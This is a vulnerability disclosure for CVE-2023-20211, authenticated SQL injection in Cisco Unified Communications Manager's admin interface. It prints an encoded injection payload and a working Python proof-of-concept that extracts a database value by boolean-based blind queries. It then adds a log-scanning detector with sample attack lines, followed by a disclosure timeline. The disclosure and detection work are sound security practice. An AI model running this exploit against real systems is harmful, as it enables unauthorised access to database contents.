CVE-2023-20211
Multiple Authenticated SQL Injection Vulnerabilities
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Cisco Unified Communications Manager
< 12.5(1)su8
Stanisław Koza and Jakub Sajniak
A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.
This CVE covers multiple endpoints that are vulnerable to SQL injection:
- GET /ccmadmin/e911MessagesEdit.do
- GET /ccmadmin/gatewayMainEdit.do
- GET /ccmadmin/phoneFindList.do
- POST /ccmadmin/phoneFindList.do
- GET /ccmadmin/userFindList.do
- POST /ccmadmin/userFindList.do
This proof of concept uses the injection found in the /ccmadmin/e911MessagesEdit.do endpoint.
To demonstrate the full impact of this vulnerability, a proof-of-concept exploit was created. The exploit aims to exfiltrate DBSERVERNAME from the sysusers table of the database running on the backend.
In this proof of concept the following payload is used:
/ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%20{currentLength})='{passwordPrefix}')%20%3e%200)%20--&protocol=0
Proof-of-concept code:
```python
# POC for CISCO Unified CM Administration SQL Injection
# Injection point is:
# /ccmadmin/gatewayMainEdit.do?key=&product=<injection>
# POC extracts DBSERVERNAME from sysusers
# PoC Created by Stanisław Koza from STM Cyber
import urllib3
import requests
from string import printable

# Configure variables below
baseurl = ""
cookies = {
    "JSESSIONID": "",
    "com.cisco.ccm.admin.servlets.RequestToken.REQUEST_TOKEN_KEY": "",
    "JSESSIONIDSSO": ""
}
# Configure this ^^^

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Candidate characters tried at each position ("\\(" keeps the original's
# backslash and parenthesis without the invalid "\(" escape sequence)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!#$&\\()*,-./:;<=>?@[]^`|~"
# Text present in the response when the injected condition evaluates to false
checkValue = "Validate String rule for Telepresence devices"
currentLength = 1
extracted = ''

print("Extracting: ", end="")
for i in range(0, 50):
    foundExtension = False
    for c in charset:
        currentLength = len(extracted) + 1
        passwordPrefix = extracted + c
        url = baseurl + f"/ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%20{currentLength})='{passwordPrefix}')%20%3e%200)%20--&protocol=0"
        r = requests.get(url, cookies=cookies, verify=False)
        if checkValue not in r.text:
            # Condition was true: the guessed prefix matches, keep it
            extracted = passwordPrefix
            foundExtension = True
            print(extracted[-1], end="", flush=True)
            break
    if not foundExtension:
        # No character extended the prefix: the full value has been recovered
        break
print(f"\n[+] Extracted from db: {extracted}")
```
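As an added defensive example, not part of the original advisory or the researchers' PoC: the following Python inspects web-server access log lines for the request shape shown in the payload above (a `product` parameter on one of the listed /ccmadmin endpoints carrying a boolean tail, a sub-select, a SUBSTRING() probe or a trailing `--`), and escalates any source whose flagged-request count matches the one-request-per-guess pattern of boolean-based blind extraction. The sample lines are constructed in combined log format; the actual Unified CM access log format, the log location and the BURST_THRESHOLD value are assumptions, while the endpoint list is the one given above.

```python
"""Log-side detection for the request shape described in CVE-2023-20211.

Added example; not the researchers' PoC and not Cisco code. Assumes a
combined-style access log whose request line contains the GET query string
(the real Unified CM log format is not given on the page).
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the advisory
VULNERABLE_ENDPOINTS = {
    "/ccmadmin/e911MessagesEdit.do",
    "/ccmadmin/gatewayMainEdit.do",
    "/ccmadmin/phoneFindList.do",
    "/ccmadmin/userFindList.do",
}

# Indicators matching the advisory's payload after URL decoding: a boolean
# tail, a sub-select, a SUBSTRING() probe, or a trailing comment terminator.
SQLI_PATTERN = re.compile(
    r"(\bor\b\s*\(|\bselect\b.*\bfrom\b|\bsubstring\s*\(|--\s*$|\bunion\b\s+select\b)",
    re.IGNORECASE,
)

# Combined log format: client ident user [timestamp] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed threshold: flagged requests from one source to one endpoint at or
# above this count are escalated, since blind extraction needs one request per guess.
BURST_THRESHOLD = 3

# Constructed sample lines (not captured from a real system); the guessed
# prefixes x / xy / xyz are placeholders, not a real DBSERVERNAME.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:10:00:01 +0000] "GET /ccmadmin/gatewayMainEdit.do?key=&product=1&protocol=0 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Oct/2023:10:00:02 +0000] "GET /ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%201)=%27x%27)%20%3e%200)%20--&protocol=0 HTTP/1.1" 200 4870',
    '10.0.0.9 - - [10/Oct/2023:10:00:03 +0000] "GET /ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%202)=%27xy%27)%20%3e%200)%20--&protocol=0 HTTP/1.1" 200 4870',
    '10.0.0.9 - - [10/Oct/2023:10:00:04 +0000] "GET /ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%203)=%27xyz%27)%20%3e%200)%20--&protocol=0 HTTP/1.1" 200 4870',
    '10.0.0.7 - - [10/Oct/2023:10:00:05 +0000] "GET /ccmadmin/otherPage.do?search=o%27brien HTTP/1.1" 200 900',
    'garbage line that does not parse',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        # parse_qs percent-decodes values, so the regex sees the SQL as sent
        "params": parse_qs(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def flag_request(req):
    """Return the parameter names carrying SQL-injection indicators (empty if clean).

    Only the advisory's endpoints are inspected, which keeps false positives
    from ordinary search boxes elsewhere in the interface low.
    """
    if req is None or req["path"] not in VULNERABLE_ENDPOINTS:
        return []
    return sorted(
        name for name, values in req["params"].items()
        if any(SQLI_PATTERN.search(v) for v in values)
    )


def analyse(lines):
    """Scan log lines.

    Returns (findings, burst_sources): findings is a list of
    (line_no, ip, path, flagged_params); burst_sources lists (ip, path)
    pairs whose flagged-request count reached BURST_THRESHOLD.
    """
    findings = []
    counts = Counter()
    for line_no, line in enumerate(lines, 1):
        req = parse_line(line)
        params = flag_request(req)
        if params:
            findings.append((line_no, req["ip"], req["path"], params))
            counts[(req["ip"], req["path"])] += 1
    burst_sources = sorted(k for k, n in counts.items() if n >= BURST_THRESHOLD)
    return findings, burst_sources


if __name__ == "__main__":
    found, bursts = analyse(SAMPLE_LOG)
    for line_no, ip, path, params in found:
        print(f"line {line_no}: {ip} -> {path} suspicious params {params}")
    for ip, path in bursts:
        print(f"[!] {ip} issued {BURST_THRESHOLD}+ flagged requests to {path}: "
              "consistent with boolean-based blind extraction")
```

Two caveats for anyone wiring this into monitoring: the POST variants of phoneFindList.do and userFindList.do carry their parameters in the request body, which an access log does not record, so those need request-body logging at a reverse proxy or WAF in front of the management interface; and because the vulnerability requires an authenticated session, a hit is also a signal that an administrator account or its session cookies are being misused, which is worth investigating even on a system already at the fixed release.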
- 03-04-2023 - Vulnerability reported to Cisco PSIRT
- 03-04-2023 - First response from Cisco
- 20-04-2023 - Successful reproduction of the vulnerability by Cisco
- 16-08-2023 - CVE-2023-20211 is assigned to the vulnerability
- 16-08-2023 - Security advisory is published by Cisco
- 10-10-2023 - Publication of PoC